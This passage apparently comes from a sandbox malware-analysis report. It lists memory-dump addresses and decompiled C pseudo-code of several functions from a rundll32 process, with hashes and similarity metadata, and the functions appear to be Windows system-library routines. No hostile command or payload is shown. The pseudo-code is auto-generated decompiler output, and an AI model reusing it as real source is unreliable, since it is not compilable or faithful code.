                                                                                                                0x0448360a
                                                                                                                0x04483612
                                                                                                                0x04483613
                                                                                                                0x0448361e
                                                                                                                0x04483622
                                                                                                                0x04483628
                                                                                                                0x0448362f
                                                                                                                0x0448362f
                                                                                                                0x04483636
                                                                                                                0x04483638
                                                                                                                0x0448363b
                                                                                                                0x04483642
                                                                                                                0x04483642
                                                                                                                0x04483636
                                                                                                                0x04483657
                                                                                                                0x04483657
                                                                                                                0x0448365c
                                                                                                                0x04483662
                                                                                                                0x04483669
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 2994545307-2202222882
                                                                                                                • Opcode ID: 47cd58e89e340277e0e363e4712d1a780b6167c6fd960cf28b23d98087e52a5d
                                                                                                                • Instruction ID: 2acc639a022ae9c05a62139eccd9a69df0f007f782027b13639785ef35ff998b
                                                                                                                • Opcode Fuzzy Hash: 47cd58e89e340277e0e363e4712d1a780b6167c6fd960cf28b23d98087e52a5d
                                                                                                                • Instruction Fuzzy Hash: AD4126F1D0152C9BEF21EE55CC80F9EB77CAB44718F00459AEA09A7241DB31AE888F95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E044D05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E044D07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04449730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E044CA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E044CA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E044D1293(_t79, _v40, E044D07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04427D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E044C138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                                0x044d05c5
                                                                                                                0x044d05ca
                                                                                                                0x044d05d3
                                                                                                                0x044d06db
                                                                                                                0x044d06db
                                                                                                                0x044d06dd
                                                                                                                0x044d06e3
                                                                                                                0x044d06e3
                                                                                                                0x044d05dd
                                                                                                                0x044d05e7
                                                                                                                0x044d05f6
                                                                                                                0x044d0600
                                                                                                                0x044d0607
                                                                                                                0x044d0610
                                                                                                                0x044d0615
                                                                                                                0x044d061a
                                                                                                                0x044d061c
                                                                                                                0x044d061e
                                                                                                                0x044d0624
                                                                                                                0x044d0625
                                                                                                                0x044d0627
                                                                                                                0x044d0628
                                                                                                                0x044d0631
                                                                                                                0x044d0640
                                                                                                                0x044d064d
                                                                                                                0x044d0654
                                                                                                                0x044d0654
                                                                                                                0x044d0631
                                                                                                                0x044d066d
                                                                                                                0x044d0674
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d0692
                                                                                                                0x044d069e
                                                                                                                0x044d06b0
                                                                                                                0x044d06a0
                                                                                                                0x044d06a9
                                                                                                                0x044d06a9
                                                                                                                0x044d06b8
                                                                                                                0x044d06d6
                                                                                                                0x044d06d6
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction ID: 6fa5338b4a5c351f5c97fce2513269f4acb60d00149c7aab3637c4ca242cff0f
                                                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction Fuzzy Hash: C631B132604345ABEB20DE25CD95F9B77D9ABC4758F04422AF958AB281E670F904CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443A61C Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0443A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x44e0220);
				E0445D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x44f7b9c; // 0x0
				_t55 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0445D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x44f7b10 =  *0x44f7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x44f536c; // 0x360ca0
					if( *_t51 != 0x44f5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x44f5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x44f536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0443A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                                0x0443a61c
                                                                                                                0x0443a61e
                                                                                                                0x0443a623
                                                                                                                0x0443a628
                                                                                                                0x0443a62b
                                                                                                                0x0443a62d
                                                                                                                0x0443a648
                                                                                                                0x0443a64a
                                                                                                                0x0443a64f
                                                                                                                0x04479b44
                                                                                                                0x0443a6ec
                                                                                                                0x0443a6f1
                                                                                                                0x0443a6f1
                                                                                                                0x0443a655
                                                                                                                0x0443a657
                                                                                                                0x0443a65a
                                                                                                                0x0443a65d
                                                                                                                0x0443a662
                                                                                                                0x0443a663
                                                                                                                0x0443a667
                                                                                                                0x0443a668
                                                                                                                0x0443a66d
                                                                                                                0x0443a706
                                                                                                                0x0443a706
                                                                                                                0x04479bda
                                                                                                                0x04479be6
                                                                                                                0x04479beb
                                                                                                                0x00000000
                                                                                                                0x04479beb
                                                                                                                0x0443a679
                                                                                                                0x04479b7a
                                                                                                                0x00000000
                                                                                                                0x04479b7a
                                                                                                                0x0443a683
                                                                                                                0x0443a6f4
                                                                                                                0x0443a6f7
                                                                                                                0x0443a6f9
                                                                                                                0x0443a6fd
                                                                                                                0x0443a6a0
                                                                                                                0x0443a6a0
                                                                                                                0x0443a6ad
                                                                                                                0x0443a6af
                                                                                                                0x0443a6b4
                                                                                                                0x04479ba7
                                                                                                                0x04479bac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04479bc6
                                                                                                                0x04479bce
                                                                                                                0x04479bd1
                                                                                                                0x04479bd3
                                                                                                                0x04479bd3
                                                                                                                0x00000000
                                                                                                                0x04479bd1
                                                                                                                0x0443a6bd
                                                                                                                0x0443a6c3
                                                                                                                0x0443a6c6
                                                                                                                0x0443a6d2
                                                                                                                0x0443a701
                                                                                                                0x0443a704
                                                                                                                0x00000000
                                                                                                                0x0443a704
                                                                                                                0x0443a6d4
                                                                                                                0x0443a6d6
                                                                                                                0x0443a6d9
                                                                                                                0x0443a6db
                                                                                                                0x0443a6e1
                                                                                                                0x0443a6e6
                                                                                                                0x0443a6e8
                                                                                                                0x0443a6e8
                                                                                                                0x0443a6ea
                                                                                                                0x00000000
                                                                                                                0x0443a6ea
                                                                                                                0x0443a688
                                                                                                                0x0443a692
                                                                                                                0x0443a694
                                                                                                                0x0443a699
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443a69d
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -5
                                                                                                                • API String ID: 0-2460486224
                                                                                                                • Opcode ID: ef97d5571d4b71d0e821d525609f265453dded6442cc143b3c297b25b8e59f61
                                                                                                                • Instruction ID: b296a3c1a3ebf609ce6fb139877c8039fab2678959f36fb719b8cf786b9b617b
                                                                                                                • Opcode Fuzzy Hash: ef97d5571d4b71d0e821d525609f265453dded6442cc143b3c297b25b8e59f61
                                                                                                                • Instruction Fuzzy Hash: C34167B5A40205DFEF14CF58C980B99BBF1FB49705F1980AAE844AB345D778B902CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04483884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E04483884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04449650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04424620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04449650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                0x04483893
                                                                                                                0x04483896
                                                                                                                0x04483899
                                                                                                                0x0448389f
                                                                                                                0x044838a0
                                                                                                                0x044838a4
                                                                                                                0x044838a9
                                                                                                                0x044838ac
                                                                                                                0x044838ad
                                                                                                                0x044838ae
                                                                                                                0x044838af
                                                                                                                0x044838b1
                                                                                                                0x044838b4
                                                                                                                0x044838bb
                                                                                                                0x044838bc
                                                                                                                0x044838bd
                                                                                                                0x044838c4
                                                                                                                0x044838c8
                                                                                                                0x044838ca
                                                                                                                0x044838ca
                                                                                                                0x044838d5
                                                                                                                0x0448393e
                                                                                                                0x04483940
                                                                                                                0x04483942
                                                                                                                0x04483952
                                                                                                                0x04483954
                                                                                                                0x04483961
                                                                                                                0x04483961
                                                                                                                0x04483967
                                                                                                                0x0448396e
                                                                                                                0x0448396e
                                                                                                                0x04483947
                                                                                                                0x0448394c
                                                                                                                0x00000000
                                                                                                                0x0448394c
                                                                                                                0x044838ea
                                                                                                                0x044838ee
                                                                                                                0x044838f8
                                                                                                                0x044838f9
                                                                                                                0x044838ff
                                                                                                                0x04483900
                                                                                                                0x04483902
                                                                                                                0x04483903
                                                                                                                0x0448390b
                                                                                                                0x0448390f
                                                                                                                0x04483950
                                                                                                                0x00000000
                                                                                                                0x04483950
                                                                                                                0x04483915
                                                                                                                0x0448391d
                                                                                                                0x0448391d
                                                                                                                0x04483922
                                                                                                                0x04483926
                                                                                                                0x00000000
                                                                                                                0x04483928
                                                                                                                0x0448392b
                                                                                                                0x0448392b
                                                                                                                0x04483935
                                                                                                                0x04483937
                                                                                                                0x04483937
                                                                                                                0x00000000
                                                                                                                0x04483935
                                                                                                                0x04483926
                                                                                                                0x044838f0
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 2994545307-215506332
                                                                                                                • Opcode ID: cf1be02f46021c287cfd621da44630fc849f37a709042d3a4013b05930bc5d75
                                                                                                                • Instruction ID: 7f2a2f895168738b1cb43da8beba035f1d8758543e6aec8a159990a5f1ed73f7
                                                                                                                • Opcode Fuzzy Hash: cf1be02f46021c287cfd621da44630fc849f37a709042d3a4013b05930bc5d75
                                                                                                                • Instruction Fuzzy Hash: A731D472901519AFEF25EE59C945D6FB774EB80B20F01416EED15A7790E632BE00CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 33%
                                                                                                                			E0443D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x44fd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04424120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0444B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E044498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E044495D0();
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                0x0443d29c
                                                                                                                0x0443d2a6
                                                                                                                0x0443d2b1
                                                                                                                0x0443d2b5
                                                                                                                0x0443d2b6
                                                                                                                0x0443d2bc
                                                                                                                0x0443d2bd
                                                                                                                0x0443d2be
                                                                                                                0x0443d2bf
                                                                                                                0x0443d2c2
                                                                                                                0x0443d2c4
                                                                                                                0x0443d2cc
                                                                                                                0x0443d384
                                                                                                                0x0443d34b
                                                                                                                0x0443d34f
                                                                                                                0x0443d350
                                                                                                                0x0443d351
                                                                                                                0x0443d35c
                                                                                                                0x0443d35c
                                                                                                                0x0443d2d6
                                                                                                                0x0443d2da
                                                                                                                0x0443d2e1
                                                                                                                0x0443d361
                                                                                                                0x0443d369
                                                                                                                0x0443d36d
                                                                                                                0x0443d2e3
                                                                                                                0x0443d2e3
                                                                                                                0x0443d2e3
                                                                                                                0x0443d2e5
                                                                                                                0x0443d2ed
                                                                                                                0x0443d2f5
                                                                                                                0x0443d2fa
                                                                                                                0x0443d302
                                                                                                                0x0443d303
                                                                                                                0x0443d30b
                                                                                                                0x0443d30f
                                                                                                                0x0443d313
                                                                                                                0x0443d318
                                                                                                                0x0443d31c
                                                                                                                0x0443d320
                                                                                                                0x0443d379
                                                                                                                0x0443d37d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447affe
                                                                                                                0x0447b001
                                                                                                                0x0447b011
                                                                                                                0x00000000
                                                                                                                0x0443d322
                                                                                                                0x0443d322
                                                                                                                0x0443d330
                                                                                                                0x0443d337
                                                                                                                0x0443d35d
                                                                                                                0x0443d339
                                                                                                                0x0443d33f
                                                                                                                0x0443d38c
                                                                                                                0x0443d38c
                                                                                                                0x0443d33f
                                                                                                                0x0443d349
                                                                                                                0x00000000
                                                                                                                0x0443d349

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 235270981aa0525043083231c16ab95c4d5a641ebd109658b1be9d2cf8ab02b7
                                                                                                                • Instruction ID: 42afd35da4d2880ca3250afa9431a336d82e0e294c9d7db7d732cfc0e956d359
                                                                                                                • Opcode Fuzzy Hash: 235270981aa0525043083231c16ab95c4d5a641ebd109658b1be9d2cf8ab02b7
                                                                                                                • Instruction Fuzzy Hash: A13197F19083059FDB21DF29C98095BBBE8EBC9B54F40052FF59593211EA38ED05DB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04411B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E04411B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0444BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0444A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0444A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04424620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                0x04411b8f
                                                                                                                0x04411b9a
                                                                                                                0x04411b9c
                                                                                                                0x04411b9e
                                                                                                                0x04411ba3
                                                                                                                0x04467010
                                                                                                                0x04467010
                                                                                                                0x00000000
                                                                                                                0x04411ba9
                                                                                                                0x04411ba9
                                                                                                                0x04411bae
                                                                                                                0x00000000
                                                                                                                0x04411bc5
                                                                                                                0x04411bca
                                                                                                                0x04411bcf
                                                                                                                0x04411bd0
                                                                                                                0x04411bd1
                                                                                                                0x04411bd2
                                                                                                                0x04411bd6
                                                                                                                0x04411bdc
                                                                                                                0x04411be0
                                                                                                                0x04466ffc
                                                                                                                0x04467000
                                                                                                                0x00000000
                                                                                                                0x04467006
                                                                                                                0x04467009
                                                                                                                0x04467009
                                                                                                                0x04411be6
                                                                                                                0x04411bec
                                                                                                                0x04411c0b
                                                                                                                0x04411c0b
                                                                                                                0x04411c0c
                                                                                                                0x04411c11
                                                                                                                0x04411c12
                                                                                                                0x04411c15
                                                                                                                0x04411c1b
                                                                                                                0x04411c1f
                                                                                                                0x04411c31
                                                                                                                0x04411c33
                                                                                                                0x04467026
                                                                                                                0x04467026
                                                                                                                0x04411c21
                                                                                                                0x04411c24
                                                                                                                0x04411c24
                                                                                                                0x04411bee
                                                                                                                0x04411bee
                                                                                                                0x04411bf2
                                                                                                                0x04411c3a
                                                                                                                0x04411bf4
                                                                                                                0x04411bf4
                                                                                                                0x04411c05
                                                                                                                0x04411c05
                                                                                                                0x04411c09
                                                                                                                0x04411c3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04411c09
                                                                                                                0x04411bec
                                                                                                                0x04411be0
                                                                                                                0x04411bae
                                                                                                                0x04411c2e

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                • API String ID: 0-3583428290
                                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction ID: 078463c7cb0549578af5038639a31185d9b5e4bfcd8a4b9cc60327d634d0f48f
                                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction Fuzzy Hash: 1C21D336600268ABEF319F958940F5BB7A9EB88754F054427EA059B310E630F90197A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0442F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0442F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
